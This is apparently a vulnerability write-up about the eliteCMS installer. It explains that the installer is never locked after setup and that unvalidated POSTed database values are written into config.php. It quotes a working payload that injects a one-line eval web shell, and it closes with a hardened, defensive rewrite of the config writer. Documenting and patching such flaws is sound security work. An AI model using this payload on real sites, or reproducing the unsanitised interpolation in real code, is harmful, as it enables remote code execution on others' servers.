eliteCMS's installer is not locked once installation has finished, so an attacker can revisit the installer URL and run the installation again.

A second flaw is that the installer can write a one-line backdoor (一句话木马) straight into admin/includes/config.php.

Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

Now look at the code that fills those session values:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken from POST without any validation. The session values are then interpolated into the double-quoted define() lines above, so anything that closes the string and the PHP tag becomes code. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

the one-line backdoor ends up written into /admin/includes/config.php.
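As an added example from the defender's side (not eliteCMS's own code), here is how the step-4 writer could be hardened: refuse to run while an install lock exists, validate the submitted values, and emit them with var_export() so that a value containing "?>" stays a string literal instead of becoming code. The install.lock path and the switch to mysqli are assumptions.

```php
<?php
// Added example, not eliteCMS code: hardened step-4 config writer.
// Assumptions: an install.lock file next to the installer, mysqli.

// 1. Refuse to run once installation has completed (install lock).
$lock = __DIR__ . '/install.lock';
if (file_exists($lock)) {
    http_response_code(403);
    exit('Installation is locked; remove install.lock to reinstall.');
}

// 2. Validate input before it reaches the session or the config file.
//    Host, database and user names get a conservative character set;
//    the password stays free-form but is emitted as a PHP literal below.
function validate_identifier($value, $max = 64) {
    if (!is_string($value) || $value === '' || strlen($value) > $max) {
        return false;
    }
    return preg_match('/^[A-Za-z0-9_.:-]+$/', $value) === 1;
}

$cfg = [];
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $f) {
    $v = isset($_POST[$f]) ? $_POST[$f] : '';
    if ($f !== 'DB_PASS' && !validate_identifier($v)) {
        exit("Invalid value for $f");
    }
    $cfg[$f] = $v;
}

// 3. var_export() yields a single-quoted PHP string with quotes and
//    backslashes escaped, so "?><?php ..." inside a value remains data
//    and is never parsed as code when config.php is later included.
$write = "<?php\n";
foreach ($cfg as $name => $value) {
    $write .= 'define(' . var_export($name, true) . ', '
            . var_export($value, true) . ");\n";
}
$write .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
$write .= "if (!\$connection) {\n";
$write .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
$write .= "}\n";
$file = '../admin/includes/config.php';
if (file_put_contents($file, $write, LOCK_EX) === false) {
    exit('Could not write config.php');
}
// 4. Write the lock so the installer cannot be reused.
file_put_contents($lock, date('c'));
```

With this, the payload shown above is written as the literal string '"?><?php eval($_POST[c]);?><?php' inside a define() call and never executes.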